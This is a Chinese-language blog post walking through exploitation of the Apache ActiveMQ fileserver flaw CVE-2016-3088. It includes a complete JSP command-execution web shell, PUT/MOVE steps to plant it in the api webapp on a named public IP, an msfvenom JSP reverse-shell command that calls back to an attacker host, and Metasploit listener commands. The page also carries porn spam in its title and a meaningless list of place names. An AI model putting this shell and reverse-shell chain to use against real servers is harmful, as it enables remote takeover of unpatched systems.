亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Apache ActiveMQ 遠程代碼執行漏洞 (CVE-

發布時間:2020-05-29 19:13:43 來源:網絡 閱讀:985 作者:wx5c99daab1f230 欄目:安全技術
簡介:2016年4月14日,國外安全研究人員 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多個安全漏洞,可使遠程***者用惡意代碼替代Web應用,在受影響系統上執行遠程代碼(CVE-2016-3088)。
8161端口為web控制臺端口,本漏洞就出現在web控制臺中。
ActiveMQ的web控制臺分三個應用,admin、api和fileserver,其中admin是管理員頁面,api是接口,fileserver是儲存文件的接口;admin和api都需要登錄后才能使用,fileserver無需登錄。
fileserver是一個RESTful API接口,我們可以通過GET、PUT、DELETE等HTTP請求對其中存儲的文件進行讀寫操作,其設計目的是為了彌補消息隊列操作不能傳輸、存儲二進制文件的缺陷,但后來發現:其使用率并不高而且文件操作容易出現漏洞。
所以,ActiveMQ在5.12.x~5.13.x版本中,已經默認關閉了fileserver這個應用(你可以conf/jetty.xml中開啟之);在5.14.0版本以后,徹底刪除了fileserver應用。

方法1.直接寫shell
訪問http://120.79.1.70:8161/fileserver 直接用bp攔截之后把post改成put 在往后面加幾行

<%@ page import="java.util.*,java.io.*"%> <% %> 
<HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION="">
<INPUT TYPE="text" NAME="comment"> 
<INPUT TYPE="submit" VALUE="Send"> 
</FORM> <pre> 
<%
 if ( request.getParameter( "comment" ) != null )
 {
     out.println( "Command: " + request.getParameter( "comment" ) + "<BR>" );
     Process p        = Runtime.getRuntime().exec( request.getParameter( "comment" ) );
     OutputStream os    = p.getOutputStream();
     InputStream in        = p.getInputStream();
     DataInputStream dis    = new DataInputStream( in );
     String disr        = dis.readLine();
     while ( disr != null )
     {
         out.println( disr ); disr = dis.readLine();
     }
 }
 %>
 </pre> 
 </BODY></HTML>

如下圖:chen.txt:
Apache ActiveMQ 遠程代碼執行漏洞 (CVE-

返回204代表成功,之后再把put改成move 后面再加一行

Destination:file:///opt/activemq/webapps/api/s.jsp

Apache ActiveMQ 遠程代碼執行漏洞 (CVE-
最后直接訪問 后面加一個api就成功了
Apache ActiveMQ 遠程代碼執行漏洞 (CVE-

方法2.利用 cron 定時任務寫 shell
現在kali里面生成一個***
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.199.109 LPORT=9999 r> bing.jsp
再把他上傳到桌面進行打開如下圖:
Apache ActiveMQ 遠程代碼執行漏洞 (CVE-

之后和之前一樣 在第一行的后面添加一行

Destination:file:///opt/activemq/webapps/api/s.jsp

Apache ActiveMQ 遠程代碼執行漏洞 (CVE-

到網站上進行查看有沒有
Apache ActiveMQ 遠程代碼執行漏洞 (CVE-

之后打開kali

use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set lhost 192.168.199.109
set lport 9999
run 

進行監聽就成功了!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

丽水市| 黑山县| 图木舒克市| 长宁区| 巴楚县| 东丽区| 信宜市| 潜山县| 方山县| 宿州市| 灌阳县| 洪湖市| 奉贤区| 浦北县| 维西| 江油市| 巴林左旗| 丰都县| 日喀则市| 韶关市| 定结县| 容城县| 辛集市| 临安市| 云和县| 亳州市| 沁水县| 临城县| 和硕县| 华坪县| 石门县| 安溪县| 东丽区| 大邑县| 奉化市| 云林县| 贡嘎县| 浦江县| 石嘴山市| 宣威市| 商丘市|